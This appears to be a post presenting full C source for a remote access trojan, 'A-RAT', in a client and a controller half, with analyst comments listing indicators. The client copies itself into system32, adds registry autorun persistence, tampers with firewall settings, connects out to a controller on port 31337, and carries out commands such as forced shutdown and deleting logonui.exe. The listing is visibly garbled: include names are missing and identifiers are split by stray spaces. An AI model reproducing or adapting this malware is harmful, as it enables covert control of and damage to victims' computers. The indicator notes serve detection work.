Examples of how to code a RAT in C
Client:
/* A-RAT BY Shoxin/Akiimoko */
/*
 * Analyst notes (client half of the listing).
 *
 * This program copies itself into system32, writes two HKLM registry values,
 * waits, connects out to a fixed TCP port and then executes one action per
 * command byte it receives.  Host and network artifacts visible in this
 * listing, usable as indicators:
 *   - file      c:\windows\system32\taskmgrbak.exe
 *   - registry  value "windows firewall" under the HKLM ...\CurrentVersion Run key
 *   - registry  value "windows live update" under the SharedAccess
 *               ...\StandardProfile\AuthorizedApplications key (ControlSet001)
 *   - network   local TCP bind on port 55555, outbound TCP connect to port 31337
 * All three writes target machine-wide locations (HKLM, system32), which
 * standard-user accounts cannot normally modify; none of the return values
 * are checked, so the network stage runs even when those writes are denied.
 *
 * The header names after each #include are missing from this copy of the
 * listing, and several identifiers and string literals below are split by
 * stray spaces; they are reproduced as found.
 */
#include
#include
#include
#ifndef _MSC_VER /* if the compiler isn't microsoft visual studio c++ 2005. */
#include
#endif
#include

#define MAXPENDING 5
#define BUFFER_SIZE 1024          /* size of the receive buffer in main() */
#define LISTENING_PORT 31337      /* controller port; main() uses the literal 31337 instead */
#define RANDOM_PORT 55555         /* fixed value despite the name; local_socket is bound to it */
#define CLIENT "taskmgrbak"       /* data written into both registry values */
#define SERVER_IP "Your IP Here"  /* placeholder for the controller address */

/*
 * Dispatch one command byte received from the controller.
 *
 * c is the first byte of the receive buffer.  Each case performs an action on
 * the host this client runs on; bytes that match no case are ignored.  No
 * value is returned on any path and the caller discards the result.
 */
int func_proc(char c)
{
    switch(c)
    {
        /* Forced shutdown through the command interpreter.  Observable as a
         * shutdown.exe child process started by the client image. */
        case 's': case 'S':
            system("shutdown -s -t 01 -f"); /* when implementing this feature ExitW indowEx would not function properly in the tests so i used system("shutdown" ) for the time being. */
            break;
        /* Retitles the top-level window whose title is exactly
         * "Windows Live Messenger", if one exists. */
        case 't': case 'T':
            SetWindowText(FindWindow(0,"Windows Live Messenger"),"You just got served!" );
            break;
        /* As written, control never leaves the `while(1);` statement, so the
         * observable effect is the receiving thread spinning at full CPU and
         * the client no longer reading commands; the two 20 MiB allocations
         * that follow are not reached. */
        case 'm': case 'M':
            while(1);
            {
                char *a = malloc(20971520);
                char *a2 = malloc(20971520);
                a = a2;
            }
            break;
        /* Attempts to delete a system binary; the result of remove() is not
         * checked.  A delete attempt against a system32 executable is a
         * high-signal file-integrity event. */
        case 'd': case 'D':
            remove("C:\\WINDOWS\\system32\\logonui.exe");
            break;
        /* Launches notepad.exe.  There is no break here, so this case also
         * runs the 'o' action below. */
        case 'n': case 'N':
            ShellExecute( NULL, "open", "notepad.exe", NULL, NULL, SW_SHOW);
        /* Opens a URL with the default handler (normally the browser). */
        case 'o': case 'O':
            ShellExecute( NULL, "open", "http://www.meatspin.com", NULL, NULL, SW_SHOW);
            break;
    }
}

/*
 * Client entry point: install, wait, connect out, then loop on received
 * command bytes.  argc/argv are not used.
 */
int main(int argc, char **argv)
{
    HKEY autoKey;
    HKEY fwKey;
    int menu_switch = 0, message_length = 0, remote_length = 0;
    SOCKET local_socket, remote_socket,message_len;
    struct sockaddr_in local_address, remote_addr;
    WSADATA wsa_data;
    char message[BUFFER_SIZE], remote_ip[32];
    int recv_timeout = 90000, send_timeout = 90000, recv_buffer_len;

    /* Self-copy.  The source name is relative, so it resolves against the
     * current working directory; the final 0 is bFailIfExists = FALSE, i.e.
     * an existing taskmgrbak.exe is overwritten.  The destination name
     * resembles a system binary - an unexpected executable in system32 with
     * this name is an indicator. */
    CopyFile("Client.exe", "c:\\windows\\system32\\taskmgrbak.exe", 0);

    /* Persistence: creates/opens the machine-wide Run key and sets a value
     * named "windows firewall" (a name chosen to look like a system
     * component) whose data is the CLIENT string, with a declared length of
     * 50 bytes.  Autorun audits and registry-write auditing on this key
     * surface it. */
    RegCreateKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\ \Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &autoKey, 0);
    RegSetValueExA(autoKey, "windows firewall", 0, REG_SZ, CLIENT, 50);
    RegCloseKey(autoKey);

    /* Firewall policy tampering: sets a value named "windows live update"
     * under the Windows Firewall AuthorizedApplications key of ControlSet001.
     * Presumably intended to add the client to the firewall allow list -
     * NOTE(review): the exact key layout the firewall reads is not shown
     * here.  Writes by a non-system process under this key are worth
     * alerting on. */
    RegCreateKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet001\\Services\\" "SharedAcc ess\\Parameters\\FirewallPolicy\\StandardProfile\\" "AuthorizedApplications", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_AL L_ACCESS, NULL, &fwKey, 0);
    RegSetValueExA(fwKey, "windows 
live update", 0, REG_SZ, CLIENT, 50);
    RegCloseKey(fwKey);

    /* Delay before any socket activity. */
    sleep(60000);

    if(WSAStartup(MAKEWORD(2, 2), &wsa_data) != 0)
    {
        fprintf(stderr, "WSAStartup failed\n");
        return 1;
        WSACleanup();
    }
    if((local_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
    {
        fprintf(stderr, "socketing failed\n");
        return 1;
        WSACleanup();
    }
    if((remote_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
    {
        fprintf(stderr, "socket() failed");
        return 1;
        WSACleanup();
        closesocket(local_socket), closesocket(remote_socket);
    }

    /* local_socket is bound to 0.0.0.0:55555.  No listen() or accept() on it
     * appears in this listing, but the bound port is visible in a socket
     * listing on the host and the bind fails if a second instance runs. */
    memset(&local_address, 0, sizeof(local_address));
    local_address.sin_family = AF_INET;
    local_address.sin_addr.s_addr = htonl(INADDR_ANY);
    local_address.sin_port = htons(RANDOM_PORT);
    if(bind(local_socket, (struct sockaddr *) &local_address, sizeof(local_address)) != 0)
    {
        fprintf(stderr, "binding failed\n");
        return 1;
        WSACleanup();
        closesocket(local_socket), closesocket(remote_socket);
    }

    /* Outbound (client-initiated) TCP connection to SERVER_IP on port 31337.
     * Egress filtering or an alert on outbound connections to this port
     * catches it; inbound-only firewall rules do not. */
    memset(&remote_addr, 0, sizeof(remote_addr));
    remote_addr.sin_family = AF_INET;
    remote_addr.sin_port = htons(31337);
    remote_addr.sin_addr.S_un.S_addr = inet_addr(SERVER_IP);
    if(connect(remote_socket, (struct sockaddr *) &remote_addr, sizeof(remote_addr)) == SOCKET_ERROR)
    {
        fprintf(stderr, "connecting failed\n");
        return 1;
        WSACleanup();
        closesocket(local_socket), closesocket(remote_socket);
    }
    remote_length = sizeof(remote_addr);

    /* 90000 ms receive and send timeouts, set on local_socket. */
    if(setsockopt(local_socket, SOL_SOCKET, SO_RCVTIMEO, (const char *) &recv_timeout , sizeof(recv_timeout)) == SOCKET_ERROR)
    {
        fprintf(stderr, "recv_timeout failed\n");
        WSACleanup();
        closesocket(local_socket), closesocket(remote_socket);
    }
    if(setsockopt(local_socket, SOL_SOCKET, SO_SNDTIMEO, (const char *) &send_timeout , sizeof(send_timeout)) == SOCKET_ERROR)
    {
        fprintf(stderr, "send_timeout failed\n");
        WSACleanup();
        closesocket(local_socket), closesocket(remote_socket);
    }

    /* Command loop: each recv() reads up to BUFFER_SIZE bytes and only the
     * first byte is dispatched.  The channel is raw cleartext with no
     * authentication in this listing, so the traffic appears on the wire as
     * very small TCP payloads on port 31337. */
    while(1)
    {
        if((message_len = recv(remote_socket, message, sizeof(message), 0)) == SOCKET_ ERROR)
        {
            fprintf(stderr, "recv failed\n");
            return 1;
            WSACleanup(); 
            closesocket(local_socket), closesocket(remote_socket);
        }
        func_proc(*message);
    }
    WSACleanup();
    closesocket(local_socket), closesocket(remote_socket);
    return 0;
}
Hosting:
/* A-RAT BY Shoxin/Akimoko*/
/*
 * Analyst notes (controller half of the listing).
 *
 * Console program that listens on TCP 31337 on all interfaces, accepts a
 * single connection and forwards each character typed on stdin to it as a
 * one-byte message.  The console title and banner strings below are stable
 * static strings suitable for matching the controller binary.
 */
#include
#include
#ifndef _MSC_VER /* if the compiler isn't microsoft visual studio c++ 2005. */
#include
#endif
#include

#define MAXPENDING 5          /* listen() backlog */
#define BUFFER_SIZE 1024
#define LISTENING_PORT 31337  /* port the client connects to */

/*
 * Controller entry point.  argc/argv are not used.  Returns 1 on any socket
 * error; the send loop has no other exit.
 */
int main(int argc, char **argv)
{
    SetConsoleTitle("A-RAT - Shoxin");
    SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_BLUE | FOREGR OUND_INTENSITY );
    int menu_switch = 0, message_length = 0, remote_length = 0;
    SOCKET local_socket, remote_socket,message_len;
    struct sockaddr_in local_address, remote_address;
    WSADATA wsa_data;
    char message[BUFFER_SIZE], remote_ip[32];

    /* Banner and command menu; the bracketed letters are the command bytes
     * handled by func_proc() in the client. */
    printf("Aki-RAT v.0.1b \n"
           "By Shoxin \n"
           " \n"
           "::Developer Version:: \n"
           " \n"
           "shouts: \n"
           "dw0rek,Mad-Hatter,g00ns.net \n");
    printf("Features/Usage: \n"
           " \n"
           ".Remote Shutdown[S] \n"
           ".Rename Windows Live Messenger Title[T] \n"
           ".Delete Logonui.exe[D] \n"
           ".Extreme Memory Leak[M] \n"
           ".Open Notepad[N] \n"
           ".Open Meatspin.com[O] \n"
           " \n"
           "Usage: 'S'\n"
           " 'T'\n"
           " 'D'\n"
           " 'M'\n"
           " etc. 
\n");

    if(WSAStartup(MAKEWORD(2, 2), &wsa_data) != 0)
    {
        fprintf(stderr, "WSAStartup failed\n");
        WSACleanup();
        return 1;
    }
    if((local_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
    {
        fprintf(stderr, "socketing failed\n");
        WSACleanup();
        return 1;
    }

    /* Listen on every local interface, port LISTENING_PORT (31337). */
    memset(&local_address, 0, sizeof(local_address));
    local_address.sin_family = AF_INET;
    local_address.sin_addr.s_addr = htonl(INADDR_ANY);
    local_address.sin_port = htons(LISTENING_PORT);
    if(bind(local_socket, (struct sockaddr *) &local_address, sizeof(local_address)) != 0)
    {
        fprintf(stderr, "binding failed\n");
        WSACleanup();
        closesocket(local_socket), closesocket(remote_socket);
        return 1;
    }
    if(listen(local_socket, MAXPENDING) != 0)
    {
        fprintf(stderr, "listening failed\n");
        WSACleanup();
        closesocket(local_socket), closesocket(remote_socket);
        return 1;
    }

    /* A single accept(): only the first client to connect is served. */
    remote_length = sizeof(remote_address);
    if((remote_socket = accept(local_socket, (struct sockaddr *) &remote_address, &re mote_length)) == INVALID_SOCKET)
    {
        fprintf(stderr, "accepting failed\n");
        WSACleanup();
        closesocket(local_socket), closesocket(remote_socket);
        return 1;
    }
    printf("Connection Established\n");

    /* message_len stays 1, so the buffer is NUL-terminated after the first
     * byte and strlen() yields at most 1: every character read from stdin,
     * including the newline after each command letter, goes out as its own
     * one-byte send(). */
    message_len = 1;
    while(1)
    {
        printf("-");
        *message = getchar();
        *(message + message_len) = '\0';
        if(send(remote_socket, message, strlen(message), 0) == SOCKET_ERROR)
        {
            fprintf(stderr, "send failed\n");
            return 1;
            WSACleanup();
            closesocket(local_socket), closesocket(remote_socket);
        }
    }
    WSACleanup();
    closesocket(local_socket), closesocket(remote_socket);
    return 0;
}